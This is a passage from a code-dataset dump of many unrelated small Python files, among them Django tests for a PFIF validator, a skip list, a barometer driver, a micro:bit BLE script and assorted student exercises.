teardown_test_environment\n\nimport controller\nimport settings\nimport tests.pfif_xml as PfifXml\n\nclass ControllerTests(unittest.TestCase):\n \"\"\"Tests for the controller.\"\"\"\n\n def setUp(self):\n # TODO(nworden): see if there's a way to avoid this. You'd think\n # settings.BASE_DIR would be useful here but I can't figure out how to make\n # it work for prod, local servers, and tests without overriding the value in\n # tests.\n # The Django test client doesn't actually run a whole server, which is\n # really nice because it's much faster, but it does seem to mess with the\n # template loader, I guess because it's not running from where it normally\n # would (in the app directory).\n settings.TEMPLATES[0]['DIRS'] = ['app/resources']\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'settings')\n django.setup()\n setup_test_environment()\n self.client = Client()\n\n def tearDown(self):\n teardown_test_environment()\n\n def make_request(\n self, post_data, path='/validate/results'):\n \"\"\"Makes a request for the validator with content as the HTTP POST content.\n Returns the response.\"\"\"\n return self.client.post(path, copy.deepcopy(post_data))\n\n # file tests\n\n def test_no_xml_fails_gracefully(self):\n \"\"\"If the user tries to validate with no input, there should not be an\n exception.\"\"\"\n for path in ['/validate/results', '/diff/results']:\n response = self.make_request({}, path=path)\n self.assertTrue(\"html\" in response.content)\n\n def test_pasting_xml(self):\n \"\"\"The page should have the correct number of errors in the header when\n using the pfif_xml_1 POST variable to send PFIF XML.\"\"\"\n response = self.make_request(\n {'pfif_xml_1' : PfifXml.XML_TWO_DUPLICATE_NO_CHILD})\n self.assertTrue(\"3 Messages\" in response.content)\n\n def test_file_upload(self):\n \"\"\"The page should have the correct number of errors in the header when\n using the pfif_xml_file_1 POST variable to send PFIF XML.\"\"\"\n xml_file = StringIO(PfifXml.XML_TWO_DUPLICATE_NO_CHILD)\n xml_file.name = 'two_duplicate_no_child.xml'\n response = self.make_request({'pfif_xml_file_1': xml_file})\n self.assertTrue(\"3 Messages\" in response.content)\n\n def test_url_upload(self):\n \"\"\"The page should have the correct number of errors in the header when\n using the pfif_xml_url_1 POST variable to send PFIF XML.\"\"\"\n utils.set_file_for_test(StringIO(PfifXml.XML_TWO_DUPLICATE_NO_CHILD))\n response = self.make_request({'pfif_xml_url_1' : 'dummy_url'})\n self.assertTrue(\"3 Messages\" in response.content)\n\n # validator\n\n def test_validator_options(self):\n \"\"\"The validator results page should have a span or div for each print\n option.\"\"\"\n xml_file = StringIO(PfifXml.XML_EXPIRE_99_EMPTY_DATA)\n xml_file.name = 'xml_expire_99_empty_data.xml'\n post_dict = {'pfif_xml_file_1' : xml_file,\n 'print_options': ['show_errors']}\n response = self.make_request(post_dict)\n self.assertTrue('ERROR' in response.content)\n self.assertTrue('message_type' in response.content)\n self.assertTrue('message_category' in response.content)\n\n post_dict['print_options'].append('show_warnings')\n response = self.make_request(post_dict)\n self.assertTrue('WARNING' in response.content)\n\n post_dict['print_options'].append('show_line_numbers')\n response = self.make_request(post_dict)\n self.assertTrue('message_line_number' in response.content)\n\n post_dict['print_options'].append('show_record_ids')\n response = self.make_request(post_dict)\n self.assertTrue('record_id' in response.content)\n\n post_dict['print_options'].append('show_full_line')\n response = self.make_request(post_dict)\n self.assertTrue('message_xml_full_line' in response.content)\n\n # EXPIRE_99 doesn't have any errors with xml element text or tag, so we use\n # a different XML file\n xml_file = StringIO(PfifXml.XML_INCORRECT_FORMAT_11)\n xml_file.name = 'xml_incorrect_format_11.xml'\n post_dict['pfif_xml_file_1'] = xml_file\n post_dict['print_options'].append('show_xml_tag')\n response = self.make_request(post_dict)\n self.assertTrue('message_xml_tag' in response.content)\n\n post_dict['print_options'].append('show_xml_text')\n response = self.make_request(post_dict)\n self.assertTrue('message_xml_text' in response.content)\n\n # diff\n\n def test_diff(self):\n \"\"\"The diff results page should have a header and a div for each message.\"\"\"\n xml_file = StringIO(PfifXml.XML_ADDED_DELETED_CHANGED_1)\n xml_file.name = 'added_deleted_changed_1.xml'\n utils.set_file_for_test(StringIO(PfifXml.XML_ADDED_DELETED_CHANGED_2))\n post_dict = {\n 'pfif_xml_file_1' : xml_file, 'pfif_xml_url_2' : 'fake_url',\n 'options' : ['text_is_case_sensitive']}\n response = self.make_request(post_dict, path='/diff/results')\n response_str = response.content\n\n # set the test file again because the first one will be at the end, and the\n # xml parser doesn't have to seek(0) on it.\n utils.set_file_for_test(StringIO(PfifXml.XML_ADDED_DELETED_CHANGED_2))\n post_dict['options'].append('group_messages_by_record')\n grouped_response = self.make_request(post_dict, path='/diff/results')\n grouped_response_str = grouped_response.content\n\n # The header should have 'Diff' and 'Messages' in it along with the filename\n # or url.\n # The body should have each of five message types from pfif_object_diff\n for message in ['Diff', 'Messages', 'added_deleted_changed_1.xml',\n 'fake_url', 'extra', 'missing', 'field', 'record', 'Value',\n 'changed', 'A', 'B']:\n self.assertTrue(message in response_str and message in\n grouped_response_str, 'The diff was missing the '\n 'following message: ' + message + '. The diff: ' +\n response_str)\n\n def test_ignore_fields(self):\n \"\"\"The diff results page should not include any fields that were passed in\n with ignore_fields.\"\"\"\n request = {'pfif_xml_1' : PfifXml.XML_ADDED_DELETED_CHANGED_1,\n 'pfif_xml_2' : PfifXml.XML_ADDED_DELETED_CHANGED_2,\n 'options' : 'text_is_case_sensitive',\n 'ignore_fields' : 'foo bar source_date'}\n response = self.make_request(request, path='/diff/results')\n response_str = response.content\n for field in ['foo', 'bar', 'source_date']:\n self.assertFalse(field in response_str, field + ' is ignored and should '\n 'not be in the response.')\n\n def test_missing_filenames(self):\n \"\"\"The diff results page should fail gracefully when diffing a pasted in\n file, which has no filename.\"\"\"\n response = self.make_request(\n {'pfif_xml_1' : PfifXml.XML_ADDED_DELETED_CHANGED_1,\n 'pfif_xml_2' : PfifXml.XML_ADDED_DELETED_CHANGED_2},\n path='/diff/results')\n response_str = response.content\n self.assertTrue('pasted in' in response_str)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"google/personfinder","sub_path":"tools/pfif-tools/tests/test_controller.py","file_name":"test_controller.py","file_ext":"py","file_size_in_byte":7197,"program_lang":"python","lang":"en","doc_type":"code","stars":515,"dataset":"github-code","pt":"37"} +{"seq_id":"41957932341","text":"import unittest, sys\nsys.path.append('..')\nfrom deletenode import Solution, ListNode\n\nclass TestDeleteNode(unittest.TestCase):\n \n def setUp(self):\n self.s = Solution()\n \n def test_deletion(self):\n case_one = [ListNode(x) for x in [4,5,1,9]]\n for x in range(len(case_one)-1):\n case_one[x].next = case_one[x+1]\n \n # Delete node 5\n self.s.deleteNode(case_one[1])\n self.assertEqual(case_one[0].path(), [4,1,9])\n \n case_two = [ListNode(x) for x in [4,5,1,9]]\n for x in range(len(case_two)-1):\n case_two[x].next = case_two[x+1]\n \n # Attempt to delete tail (node 9)\n self.s.deleteNode(case_two[-1])\n self.assertEqual(case_two[0].path(), [4,5,1,9])\n \n \nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Hilldrupca/LeetCode","sub_path":"python/Top Interview Questions - Easy/Linked List/tests/test_deletenode.py","file_name":"test_deletenode.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"86364239428","text":"class Laptop:\n\n laptopCount = 0\n\n def __init__(self, color, screen, weight):\n self.laptopcolor = color\n self.laptopscreen = screen\n self.laptopweight = weight\n Laptop.laptopCount = Laptop.laptopCount + 1\n\n def display(self):\n print('laptop of color : ',self.laptopcolor, ',screen : ',self.laptopscreen, ',weight : ',self.laptopweight)\n if(hasattr(self,'size')):\n print('laptop size : ' , self.size)\n else:\n print(\"laptop size not defined\")\n\n def ShowLaptopCount():\n print(Laptop.laptopCount)\n\n \nlaptop1 = Laptop('red','LED',56)\nsetattr(laptop1,'size' , 15.7)\nLaptop.display(laptop1)\n\nlaptop2 = Laptop('blue','LCD',42)\nLaptop.display(laptop2)\n\nLaptop.ShowLaptopCount()\n\nprint(\"Laptop.__doc__: \", Laptop.__doc__)\nprint(\"Laptop.__dict__: \", Laptop.__dict__)\n","repo_name":"saurabhtatasteel/PythonNewDemo","sub_path":"PythonNewDemo/ClassLaptop.py","file_name":"ClassLaptop.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35957510643","text":"\"\"\"Module gathering the tests of the objects operators\"\"\"\n\n# pylint: disable=import-error\nimport pytest\nfrom monggregate.operators.objects import(\n MergeObjects, merge_objects,\n ObjectToArray, object_to_array\n)\n\n@pytest.mark.operators\n@pytest.mark.unit\n@pytest.mark.functional\nclass TestObjectsOperators:\n \"\"\"This class only aims at reusing the markers\"\"\"\n\n def test_merge_objects(self)->None:\n \"\"\"Tests the $mergeObjects operator\"\"\"\n\n merge_objects_op = MergeObjects(\n expression = \"$quantity\"\n )\n\n # Unit test\n # --------------\n assert merge_objects_op\n\n # Functinal test\n # ---------------\n assert merge_objects_op.statement == merge_objects(\"$quantity\").statement == {\n \"$mergeObjects\" : \"$quantity\"\n }\n\n def test_object_to_array(self)->None:\n \"\"\"Tests the $mergeObjects operator\"\"\"\n\n object_to_array_op = ObjectToArray(\n expression = \"$dimensions\"\n )\n\n # Unit test\n # --------------\n assert object_to_array_op\n\n # Functinal test\n # ---------------\n assert object_to_array_op.statement == object_to_array(\"$dimensions\").statement == {\n \"$objectToArray\" : \"$dimensions\"\n }\n","repo_name":"VianneyMI/monggregate","sub_path":"test/test_operators_objects.py","file_name":"test_operators_objects.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"18887806294","text":"import math\n\nclass SkipListNode:\n def __init__(self, value = None):\n self.val = int(value)\n self.pointers = None\n self.next = None\n def appendNode(self, node):\n if hasattr(node, \"pointers\"):\n self.next = node\n else:\n raise \"invalid node\"\n \nclass SkipList:\n def __init__(self, lst = None):\n \"\"\"\n If a initial list is provided, the skiplist will be initialized with all the elements, in order.\n \"\"\"\n self.root = None\n self.last = None\n self.length = 0\n if lst != None:\n for i in lst:\n self.append(i)\n \n def __len__(self):\n return self.length\n\n def __getitem__(self, index):\n if index >= self.length:\n raise Exception(\"Invalid index error %d, %d\" % (index, self.length))\n else:\n node = self.root\n c = 0\n while c < index:\n node = node.next\n c += 1\n return node\n \n def __getslice__(self, start, end):\n \"\"\"\n Take note that this method returns a standard python list.\n \"\"\"\n node = self[start]\n val = []\n val.append(node.val)\n while start < end:\n node = node.next\n start += 1\n val.append(node.val)\n return val\n\n def __iadd__(self, other):\n self.append(other)\n\n def __str__(self):\n return \" \".join(str(k[1]) for k in enumerate(self.get_list()))\n\n def __repr__(self):\n return str(self.get_list())\n \n def append(self, value):\n if self.root is None:\n self.root = SkipListNode(value)\n self.last = self.root\n else:\n node = SkipListNode(value)\n self.last.appendNode(node)\n self.last = node\n self.length += 1\n\n def get_list(self):\n \"\"\"\n Return a simple Python list with all the values of the skiplist.\n \"\"\"\n lst = []\n nd = self.root\n while nd != None:\n lst.append(nd.val)\n nd = nd.next\n return lst\n \n def default_skip_length(self):\n \"\"\"\n Calculates the length of the skip pointers.\n This method provides the assignment default of sqrt(list length).\n \"\"\"\n l = len(self)\n skip_length = math.floor(math.sqrt(l))\n return skip_length\n \n def gen_skips(self, skipLengthFn):\n \"\"\"\n This method generates pairs of nodes that should be joined by skip pointers.\n It takes in a helper fn that should provide the distance the skip pointers should be jumping over. An example of such a fn is self.default_skip_length\n \n skipLengthFn: (a:SkipList) -> int\n \"\"\"\n init = 1\n skip_length = skipLengthFn()\n l = len(self)\n target = init + skip_length\n while init < l and target < l:\n yield (init, target)\n init = target\n target = init + skip_length\n \n def create_skips(self):\n \"\"\"\n Creates the skip pointers, using the nodes provided by the gen_skips function.\n \"\"\"\n c = 1\n node = self.root\n for i,t in self.gen_skips(self.default_skip_length):\n while i > c:\n node = node.next\n c += 1\n target_node = node\n node.pointers = []\n while t > c:\n target_node = target_node.next\n c += 1\n node.pointers.append(target_node)\n node = target_node\n","repo_name":"darora/cs3245","sub_path":"ass2/skiplist.py","file_name":"skiplist.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5969463370","text":"from __future__ import division, print_function\n\n__copyright__=\"\"\"Copyright (c) 2003-2018 by The University of Queensland\nhttp://www.uq.edu.au\nPrimary Business: Queensland, Australia\"\"\"\n__license__=\"\"\"Licensed under the Apache License, version 2.0\nhttp://www.apache.org/licenses/LICENSE-2.0\"\"\"\n__url__=\"https://launchpad.net/escript-finley\"\n\n__all__ = ['Subsidence']\n\nfrom .base import ForwardModel\nfrom esys.escript import Data, FunctionOnBoundary\nfrom esys.escript.linearPDEs import LinearPDESystem\nfrom esys.escript.util import *\n\n\nclass Subsidence(ForwardModel):\n \"\"\"\n Forward Model for subsidence inversion minimizing\n integrate( (inner(w,u)-d)**2)\n where u is the surface displacement due to a pressure change P\n \"\"\"\n def __init__(self, domain, w, d, lam, mu, coordinates=None, tol=1e-8):\n \"\"\"\n Creates a new subsidence on the given domain\n\n :param domain: domain of the model\n :type domain: `Domain`\n :param w: data weighting factors and direction\n :type w: ``Vector`` with ``FunctionOnBoundary``\n :param d: displacement measured at surface\n :type d: ``Scalar`` with ``FunctionOnBoundary``\n :param lam: 1st Lame coefficient\n :type lam: ``Scalar`` with ``Function``\n :param lam: 2st Lame coefficient/Shear modulus\n :type lam: ``Scalar`` with ``Function``\n :param coordinates: defines coordinate system to be used (not supported yet))\n :type coordinates: `ReferenceSystem` or `SpatialCoordinateTransformation`\n :param tol: tolerance of underlying PDE\n :type tol: positive ``float``\n \"\"\"\n super(Subsidence, self).__init__()\n DIM=domain.getDim()\n\n self.__pde=LinearPDESystem(domain)\n self.__pde.setSymmetryOn()\n self.__pde.getSolverOptions().setTolerance(tol)\n #... set coefficients ...\n C=self.__pde.createCoefficient('A')\n for i in range(DIM):\n for j in range(DIM):\n C[i,i,j,j]+=lam\n C[i,j,i,j]+=mu\n C[i,j,j,i]+=mu\n x=domain.getX()\n msk=whereZero(x[DIM-1])*kronecker(DIM)[DIM-1]\n for i in range(DIM-1):\n xi=x[i]\n msk+=(whereZero(xi-inf(xi))+whereZero(xi-sup(xi))) *kronecker(DIM)[i]\n self.__pde.setValue(A=C,q=msk)\n\n self.__w=interpolate(w, FunctionOnBoundary(domain))\n self.__d=interpolate(d, FunctionOnBoundary(domain))\n\n def rescaleWeights(self, scale=1., P_scale=1.):\n \"\"\"\n rescales the weights\n \n :param scale: scale of data weighting factors\n :type scale: positive ``float``\n :param P_scale: scale of pressure increment\n :type P_scale: ``Scalar``\n \"\"\"\n pass\n\n def getArguments(self, P):\n \"\"\"\n Returns precomputed values shared by `getDefect()` and `getGradient()`.\n\n :param P: pressure\n :type P: ``Scalar``\n :return: displacement u\n :rtype: ``Vector``\n \"\"\"\n DIM=self.__pde.getDim()\n self.__pde.setValue(y=Data(),X=P*kronecker(DIM))\n u= self.__pde.getSolution()\n return u,\n\n def getDefect(self, P,u):\n \"\"\"\n Returns the value of the defect.\n\n :param P: pressure\n :type P: ``Scalar``\n :param u: corresponding displacement\n :type u: ``Vector``\n :rtype: ``float``\n \"\"\"\n return 0.5*integrate((inner(u,self.__w)-self.__d)**2)\n\n def getGradient(self, P, u):\n \"\"\"\n Returns the gradient of the defect with respect to susceptibility.\n\n :param P: pressure\n :type P: ``Scalar``\n :param u: corresponding displacement\n :type u: ``Vector``\n :rtype: ``Scalar``\n \"\"\"\n d=inner(u,self.__w)-self.__d\n self.__pde.setValue(y=d*self.__w,X=Data())\n ustar=self.__pde.getSolution()\n\n return div(ustar)\n\n","repo_name":"esys-escript/esys-escript.github.io","sub_path":"downunder/py_src/forwardmodels/subsidence.py","file_name":"subsidence.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"5751632455","text":"# evenements\n\ndef on_bluetooth_connected():\n basic.show_icon(IconNames.YES)\n basic.pause(100)\n basic.clear_screen()\nbluetooth.on_bluetooth_connected(on_bluetooth_connected)\n\ndef on_bluetooth_disconnected():\n basic.show_icon(IconNames.NO)\nbluetooth.on_bluetooth_disconnected(on_bluetooth_disconnected)\n\ndef on_button_pressed_a():\n bluetooth.uart_write_string(\"BtnA\\n\")\n serial.write_string(\"\" + (\"BtnA\\r\\n\"))\ninput.on_button_pressed(Button.A, on_button_pressed_a)\n\ndef on_button_pressed_b():\n bluetooth.uart_write_string(\"BtnB\\n\")\n serial.write_string(\"\" + (\"BtnB\\r\\n\"))\ninput.on_button_pressed(Button.B, on_button_pressed_b)\n\ndef on_uart_data_received():\n global s\n s = bluetooth.uart_read_until(serial.delimiters(Delimiters.NEW_LINE))\n serial.write_string(\"\" + s + serial.NEW_LINE)\n basic.show_icon(IconNames.HEART)\n basic.pause(30)\n basic.clear_screen()\nbluetooth.on_uart_data_received(serial.delimiters(Delimiters.NEW_LINE),\n on_uart_data_received)\n\ns = \"\"\ninput.set_accelerometer_range(AcceleratorRange.EIGHT_G)\nserial.redirect_to_usb()\nserial.set_baud_rate(BaudRate.BAUD_RATE115200)\nbluetooth.start_uart_service()\nbasic.show_icon(IconNames.NO)","repo_name":"mistert14-caen/ubit-ble-serial1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12443755274","text":"import smbus2\nimport time\n\n\nclass Barometer:\n def __init__(self):\n # Get I2C bus\n self.bus = smbus2.SMBus(1)\n\n # MPL3115A2 address, 0x60(96)\n # Select control register, 0x26(38)\n #\t\t0xB9(185)\tActive mode, OSR = 128, Altimeter mode\n self.bus.write_byte_data(0x60, 0x26, 0xB9)\n # MPL3115A2 address, 0x60(96)\n # Select data configuration register, 0x13(19)\n #\t\t0x07(07)\tData ready event enabled for altitude, pressure, temperature\n self.bus.write_byte_data(0x60, 0x13, 0x07)\n # MPL3115A2 address, 0x60(96)\n # Select control register, 0x26(38)\n #\t\t0xB9(185)\tActive mode, OSR = 128, Altimeter mode\n self.bus.write_byte_data(0x60, 0x26, 0xB9)\n\n def getData(self):\n # MPL3115A2 address, 0x60(96)\n # Read data back from 0x00(00), 6 bytes\n # status, tHeight MSB1, tHeight MSB, tHeight LSB, temp MSB, temp LSB\n data = self.bus.read_i2c_block_data(0x60, 0x00, 6)\n\n # Convert the data to 20-bits\n tHeight = ((data[1] * 65536) + (data[2] * 256) + (data[3] & 0xF0)) / 16\n temp = ((data[4] * 256) + (data[5] & 0xF0)) / 16\n altitude = tHeight / 16.0\n cTemp = temp / 16.0\n fTemp = cTemp * 1.8 + 32\n\n return [altitude,cTemp]\n\n def getPressure(self):\n # MPL3115A2 address, 0x60(96)\n # Read data back from 0x00(00), 4 bytes\n # status, pres MSB1, pres MSB, pres LSB\n data = self.bus.read_i2c_block_data(0x60, 0x00, 4)\n\n # Convert the data to 20-bits\n pres = ((data[1] * 65536) + (data[2] * 256) + (data[3] & 0xF0)) / 16\n pressure = (pres / 4.0) / 1000.0\n\n return pressure\n","repo_name":"AyberkY/ISS-SpaceGrant18-19","sub_path":"Barometer/mpl3115a2.py","file_name":"mpl3115a2.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2306342329","text":"\na=int(input(\"Enter any no\"))\ni=0\nb=0\nwhile a>0:\n b=a%10\n i=(i*10)+b\n a=a//10\nif a==i:\n print(\"Palindrome no\")\nelse:\n print(\"not palindrome no\")\n","repo_name":"jyotirmayeemohanta/Function","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74752662826","text":"\n\n#If i want to execute 2 logics--------->means keep in 2 run()methods--->means take 2 classes\n#------>means 2 Threads\nimport threading\nclass x(threading.Thread):\n def run(self): # thread 2\n for p in range(100):\n print(p)\n\n \nclass y(threading.Thread):\n def run(self): # thread 3\n for q in range(100,200):\n print(q)\n #print(a)\n \nx1=x() #main thread\nx1.start()\ny1=y()\ny1.start()\n#x1.start() #Threads can only be started once\nfor r in range(200,300):\n print(r)\nfor s in range(300,400):\n print(s)\n\n#here total 3 threads--->1.main thread 2.'X' class thread 3. 'Y' class thread \n\n#If multiple threads are running,if we get error in one thread, then will it effect the other\n# thread execution?-------->\n","repo_name":"Shashivardhan3/python","sub_path":"multithreading/84 2 run methods 2 classes.py","file_name":"84 2 run methods 2 classes.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39483984973","text":"def minion_game(string):\n # your code goes here\n vowels = [\"A\", \"E\", \"I\", \"O\", \"U\"]\n Stuart = 0\n Kevin = 0\n for i in range(len(string)):\n if string[i] in vowels:\n Kevin += len(string) - i\n else:\n Stuart += len(string) - i\n\n if Stuart > Kevin:\n print(f\"Stuart {Stuart}\")\n elif Stuart == Kevin:\n print(\"Draw\")\n else:\n print(f\"Kevin {Kevin}\")\n\n\nif __name__ == '__main__':\n s = input()\n minion_game(s)\n","repo_name":"nhannh1526/Hackerrank-Solutions","sub_path":"Python/Strings/The Minion Game.py","file_name":"The Minion Game.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6300252665","text":"from django.core import checks\nfrom django.db.backends.base.validation import BaseDatabaseValidation\n\n\nclass DatabaseValidation(BaseDatabaseValidation):\n def check_field_type(self, field, field_type):\n \"\"\"Oracle doesn't support a database index on some data types.\"\"\"\n errors = []\n if field.db_index and field_type.lower() in self.connection._limited_data_types:\n errors.append(\n checks.Warning(\n \"Oracle does not support a database index on %s columns.\"\n % field_type,\n hint=(\n \"An index won't be created. Silence this warning if \"\n \"you don't care about it.\"\n ),\n obj=field,\n id=\"fields.W162\",\n )\n )\n return errors\n","repo_name":"django/django","sub_path":"django/db/backends/oracle/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"19922654613","text":"from django.contrib import admin\nfrom django.forms import ModelForm\nfrom contracts.models import Contract\n\nfrom events.models import Event\n\n\nclass EventForm(ModelForm):\n class Meta:\n model = Event\n fields = (\n 'name',\n 'contract',\n 'support_contact',\n 'is_finished',\n 'attendees',\n 'event_date',\n 'notes'\n )\n\n def save(self, commit=True):\n event = super().save(commit=False)\n event.client = event.contract.client\n if commit:\n event.save()\n return event\n\n\n@admin.register(Event)\nclass EventAdmin(admin.ModelAdmin):\n form = EventForm\n list_display = (\n 'id',\n 'name',\n 'client',\n 'contract',\n 'support_contact',\n 'is_finished',\n 'attendees',\n 'event_date',\n 'notes'\n )\n search_fields = ('name', 'client__company_name')\n list_filter = ('contract', 'support_contact', 'is_finished')\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == \"contract\":\n kwargs[\"queryset\"] = Contract.objects.filter(is_signed=True)\n return super().formfield_for_foreignkey(db_field, request, **kwargs)\n","repo_name":"SelHel/Implement_A_Secure_Database_With_Django_ORM_And_PostgreSQL","sub_path":"events/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74709581866","text":"\"\"\"\n作者: LoresDing\n版本: v2.0.0\n时间: 2023/03/22\n图元管理widget,用于展示识别来源\n\"\"\"\nimport random\nfrom settings import Settings\nfrom PySide6.QtWidgets import QGraphicsScene, QGraphicsPixmapItem, QGraphicsItem, QGraphicsPolygonItem, QStyle\nfrom PySide6.QtGui import QPixmap, QPolygon, QPen, QColor\nfrom PySide6.QtCore import QPoint\n\nclass GraphScene(QGraphicsScene):\n \"\"\"\n 图像管理场景\n \"\"\"\n def __init__(self):\n super().__init__()\n\nclass GraphicsPolygonItem(QGraphicsPolygonItem):\n \"\"\"\n 框图元\n \"\"\"\n def __init__(self, points, index, parent, window):\n super().__init__()\n # 识别结果的id\n self.index = index\n self.window = window\n self.color = random.choices(Settings.BOX_COLORS)[0]\n self.points = points\n self.setPen(QPen(QColor(*self.color), 1))\n # 画框\n self.polygon = QPolygon()\n for point in points:\n self.polygon.append(QPoint(point[0], point[1]))\n self.setPolygon(self.polygon)\n # 设置可以选择\n self.setFlag(QGraphicsItem.ItemIsSelectable, True)\n parent.addItem(self)\n\n def paint(self, painter, option, widget):\n # 设置选中样式\n if self.isSelected():\n painter.setBrush(QColor(*self.color, 127))\n painter.setPen(QPen(QColor(*self.color), 1))\n painter.drawPolygon(self.polygon)\n # 取消默认的虚线\n option.state = QStyle.State_None\n self.window.ui.listWidget.setCurrentRow(self.index)\n # self.signal.emit(self.index)\n super().paint(painter, option, widget)\n \nclass GraphicsImageItem(QGraphicsPixmapItem):\n \"\"\"\n 照片图源\n \"\"\"\n def __init__(self, path, parent):\n super().__init__()\n self.pix = QPixmap(path)\n # 设置图元\n self.setPixmap(self.pix)\n # 加入图元\n parent.addItem(self)","repo_name":"loresding/donkeyOCR","sub_path":"app/gui/widgets/graph_scene.py","file_name":"graph_scene.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70445970026","text":"import sys\ninput = lambda:sys.stdin.readline().rstrip()\n\ndef count_by_value(arry, x):\n n = len(arry)\n\n left_index = left(arry, x, 0, n-1)\n\n if left_index == None:\n return 0\n\n right_index = right(arry, x, 0, n-1)\n\n return right_index - left_index + 1\n\ndef left(arry, x, start, end):\n \n if start > end:\n return None\n \n mid = (start + end) // 2\n\n if (mid == 0 or x > arry[mid - 1]) and arry[mid] == x:\n return mid\n elif arry[mid] >= x:\n return left(arry, x, start, mid - 1)\n elif arry[mid] < x:\n return left(arry, x, mid + 1, end)\n\ndef right(arry, x, start, end):\n\n if start > end:\n return None\n \n mid = (start + end) // 2\n\n if (mid == n - 1 or arry[mid + 1] > x) and arry[mid] == x:\n return mid\n elif arry[mid] > x:\n return right(arry, x, start, mid - 1)\n elif arry[mid] <= x:\n return right(arry, x, mid + 1, end)\n\n\nn, x = map(int, input().split())\narry = list(map(int, input().split()))\n\ncount = count_by_value(arry, x)\n\nif count == 0:\n print(-1)\nelse:\n print(count)\n","repo_name":"kdozlo/algorithm-study-Python","sub_path":"algorithm_study/thissipython_BinarySearch/p367_1.py","file_name":"p367_1.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379377387","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl import app\nfrom absl import flags\nimport pandas as pd\nfrom six.moves import range\nfrom six.moves import zip\nfrom side_effects_penalties import agent_with_penalties\nfrom side_effects_penalties import training\nfrom side_effects_penalties.file_loading import filename\n\n\nFLAGS = flags.FLAGS\n\nif __name__ == '__main__': # Avoid defining flags when used as a library.\n # Side effects penalty settings\n flags.DEFINE_enum('baseline', 'inaction',\n ['start', 'inaction', 'stepwise', 'step_noroll'],\n 'Baseline.')\n flags.DEFINE_enum('dev_measure', 'rel_reach',\n ['none', 'reach', 'rel_reach',\n 'uvfa_rel_reach', 'att_util'],\n 'Deviation measure.')\n flags.DEFINE_enum('dev_fun', 'truncation', ['truncation', 'absolute'],\n 'Summary function for the deviation measure.')\n flags.DEFINE_float('discount', 0.99, 'Discount factor for rewards.')\n flags.DEFINE_float('value_discount', 0.99,\n 'Discount factor for deviation measure value function.')\n flags.DEFINE_float('beta', 30.0, 'Weight for side effects penalty.')\n flags.DEFINE_string('nonterminal', 'disc',\n 'Penalty for nonterminal states relative to terminal'\n 'states: none (0), full (1), or disc (1-discount).')\n flags.DEFINE_bool('exact_baseline', False,\n 'Compute the exact baseline using an environment copy.')\n # Agent settings\n flags.DEFINE_bool('anneal', True,\n 'Whether to anneal the exploration rate from 1 to 0.')\n flags.DEFINE_integer('num_episodes', 10000, 'Number of episodes.')\n flags.DEFINE_integer('num_episodes_noexp', 0,\n 'Number of episodes with no exploration.')\n flags.DEFINE_integer('seed', 1, 'Random seed.')\n # Environment settings\n flags.DEFINE_string('env_name', 'box', 'Environment name.')\n flags.DEFINE_bool('noops', True, 'Whether the environment includes noops.')\n flags.DEFINE_integer('movement_reward', 0, 'Movement reward.')\n flags.DEFINE_integer('goal_reward', 1, 'Reward for reaching a goal state.')\n flags.DEFINE_integer('side_effect_reward', -1,\n 'Hidden reward for causing side effects.')\n # Settings for outputting results\n flags.DEFINE_enum('mode', 'save', ['print', 'save'],\n 'Print results or save to file.')\n flags.DEFINE_string('path', '', 'File path.')\n flags.DEFINE_string('suffix', '', 'Filename suffix.')\n\n\ndef run_experiment(\n baseline, dev_measure, dev_fun, discount, value_discount, beta, nonterminal,\n exact_baseline, anneal, num_episodes, num_episodes_noexp, seed,\n env_name, noops, movement_reward, goal_reward, side_effect_reward,\n mode, path, suffix):\n \"\"\"Run agent and save or print the results.\"\"\"\n performances = []\n rewards = []\n seeds = []\n episodes = []\n if 'rel_reach' not in dev_measure and 'att_util' not in dev_measure:\n dev_fun = 'none'\n nonterminal_weights = {'none': 0.0, 'disc': 1.0-discount, 'full': 1.0}\n nonterminal_weight = nonterminal_weights[nonterminal]\n reward, performance = training.run_agent(\n baseline=baseline,\n dev_measure=dev_measure,\n dev_fun=dev_fun,\n discount=discount,\n value_discount=value_discount,\n beta=beta,\n nonterminal_weight=nonterminal_weight,\n 